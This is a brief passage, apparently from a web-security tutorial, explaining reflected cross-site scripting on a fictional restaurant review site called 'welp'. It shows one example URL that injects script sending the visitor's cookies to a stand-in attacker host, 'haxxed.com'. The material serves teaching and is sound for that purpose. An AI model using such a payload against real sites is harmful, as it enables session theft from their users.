Reflected XSS
To test this, he crafts a URL with a snippet of JavaScript in the search parameter.
www.welp.com?search=<script>window.location='www.haxxed.com?cookie='+document.cookie</script>
The indifferent restaurant review site
I guess you should search for food or something.